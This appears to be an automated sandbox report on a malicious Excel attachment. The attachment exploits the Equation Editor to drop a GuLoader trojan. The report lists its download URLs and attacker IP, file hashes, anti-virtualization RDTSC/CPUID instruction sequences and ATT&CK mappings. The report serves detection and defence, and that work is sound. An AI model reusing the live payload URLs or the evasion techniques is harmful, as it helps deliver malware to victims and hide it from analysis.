Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Stream path 'EncryptedPackage' entropy: 7.99875082678 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7036	6_2_003E7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E100E	6_2_003E100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4071	6_2_003E4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E42CD	6_2_003E42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B1A	6_2_003E1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B5F	6_2_003E1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E43F1	6_2_003E43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52	6_2_003E7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0EFE	6_2_003E0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0FB5	6_2_003E0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E6F9E	6_2_003E6F9E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2793	6_2_003E2793

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E01BE second address: 00000000003E01BE instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E70C1 second address: 00000000003E70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DB2 second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E8DFF second address: 00000000003E8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F50BC89D70Fh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003E7A0D second address: 00000000003E7A0D instructions:

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E54E7 rdtsc

6_2_003E54E7

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 740	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E54E7 rdtsc

6_2_003E54E7

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E50CA mov eax, dword ptr fs:[00000030h]	6_2_003E50CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958 mov eax, dword ptr fs:[00000030h]	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E71A9 mov eax, dword ptr fs:[00000030h]	6_2_003E71A9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E6B93 mov eax, dword ptr fs:[00000030h]	6_2_003E6B93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B mov eax, dword ptr fs:[00000030h]	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52 mov eax, dword ptr fs:[00000030h]	6_2_003E7D52

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2360338564.0000000000A50000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003E2183 cpuid

6_2_003E2183

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery313	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MTIR21487610_0062180102_20210714081247.PDF.xlsx	28%	ReversingLabs	Document-OLE.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	42%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	14%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	31%	ReversingLabs	Win32.Trojan.Vebzenpak
C:\Users\Public\vbc.exe	42%	Virustotal		Browse
C:\Users\Public\vbc.exe	14%	Metadefender		Browse
C:\Users\Public\vbc.exe	31%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://ceattire.com/bin_UYDMbHwI28.bin	0%	Avira URL Cloud	safe
http://180.214.239.39/cpu/.svchost.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ceattire.com/bin_UYDMbHwI28.bin	true	Avira URL Cloud: safe	unknown
http://180.214.239.39/cpu/.svchost.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.day.com/dam/1.0	300F3110.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	449166
Start date:	15.07.2021
Start time:	11:05:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MTIR21487610_0062180102_20210714081247.PDF.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/11@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 53% Number of executed functions: 6 Number of non-executed functions: 49
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:06:04	API Interceptor	71x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
180.214.239.39	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39/port/.svchost.exe
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/ssh/.svchost.exe
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39/mssn/.svchost.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	Booking Confirmation.xlsx	Get hash	malicious	Browse	180.214.239.39
	kung.xlsx	Get hash	malicious	Browse	103.140.250.43
	TT PAYMENT CONFIRMATION.xlsx	Get hash	malicious	Browse	103.89.90.94
	lokibot.docx	Get hash	malicious	Browse	103.133.106.144
	payment advice.exe	Get hash	malicious	Browse	103.89.91.38
	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	103.140.250.43
	INVM220210055600512.xlsx	Get hash	malicious	Browse	103.89.90.94
	xP0clPWhrv.exe	Get hash	malicious	Browse	103.133.106.117
	Doc1892071321.exe	Get hash	malicious	Browse	103.133.104.146
	http___103.89.90.94_suket_wininit.exe	Get hash	malicious	Browse	103.89.90.94
	DOC.1000000567.267805032019.doc__.rtf	Get hash	malicious	Browse	103.133.106.117
	shipping quote.xlsx	Get hash	malicious	Browse	103.140.250.43
	INVM220210055600512.xlsx	Get hash	malicious	Browse	103.89.90.94
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.140.250.43
	OUTSTANDING SOA.xlsx	Get hash	malicious	Browse	103.145.253.94
	6306093940.xlsx	Get hash	malicious	Browse	180.214.239.39
	INVM220210055600512.xlsx	Get hash	malicious	Browse	103.89.90.94
	pXL06trbQ2.exe	Get hash	malicious	Browse	103.133.106.117
	DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc	Get hash	malicious	Browse	103.133.106.117
	11.xlsx	Get hash	malicious	Browse	103.140.250.43

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Booking Confirmation.xlsx	Get hash	malicious	Browse
C:\Users\Public\vbc.exe	Booking Confirmation.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	267376
Entropy (8bit):	4.7769054763067915
Encrypted:	false
SSDEEP:	1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
MD5:	FCFB0EC70F1419EDE8A534CC95CB61E9
SHA1:	D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
SHA-256:	FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
SHA-512:	FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, Author: Joe Security
Antivirus:	Antivirus: Virustotal, Detection: 42%, Browse Antivirus: Metadefender, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 31%
Joe Sandbox View:	Filename: Booking Confirmation.xlsx, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://180.214.239.39/cpu/.svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B2651CA.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8121852211833085
Encrypted:	false
SSDEEP:	3072:I34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:y4UcLe0JOcXuunhqcS
MD5:	DDF289FE9FBEE88B186842F4CA188ABC
SHA1:	D15B3CE044EA211660351020692DA491E83C1480
SHA-256:	96A9A2298922548EA172E06B5945D134D0937502B85C2461A1F4DD211FB815D7
SHA-512:	6C8B7DCB7B91DD41F9EEA3E2BB1F963161B450FE8C0FF4A00D0FF91DF11302073087D36AB2B7422225FB86709C468684AC25B00717216F279EC904B7AB1BDF07
Malicious:	false
Reputation:	low
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................P$...0./..f.P.@V.%...../.P./......./.4./.RQ.Q../.../......./.../.$Q.Q../.../. ...Id.P../.../. ............d.P........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........@./.X...../.../..8.P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48E1DDD1.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.076880855619051
Encrypted:	false
SSDEEP:	96:+SHfCsL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5KcjU+H3tWa6WdTfOYLpR8d
MD5:	55187CB63A1502A53DFF777D0ED28018
SHA1:	9C1CD11BEC1ACADE219D95701D4906DF54719DEC
SHA-256:	533B9EF863D579278C5903883DD56C133585D35D011492158E9CC474165B984B
SHA-512:	33741FFD87CE2E83E23CF26AE52E3A5AB69F5E7CE317E88326E13A4ADF18EC1BE7329AEF3EABB35AB5ED91C3F4FA83483F97B579D44EEB6548BFA935291EF394
Malicious:	false
Reputation:	low
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................5.6.).X.......d.......................@...'.q....\..................W.q.........6.v_.q......q.k5.Dy.wX.................w....$.......d.......$...J^.q.... ^.q0..X...m......-.......<.w................<..v.Zkv....X.zT.....k5.......................lvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B42899E.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\750B075C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95A3F107.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:	dropped
Size (bytes):	62140
Entropy (8bit):	7.529847875703774
Encrypted:	false
SSDEEP:	1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:	722C1BE1697CFCEAE7BDEFB463265578
SHA1:	7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:	2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:	false
Preview:	......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A242A343.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	94963
Entropy (8bit):	7.9700481154985985
Encrypted:	false
SSDEEP:	1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:	17EC925977BED2836071429D7B476809
SHA1:	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:	3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:	false
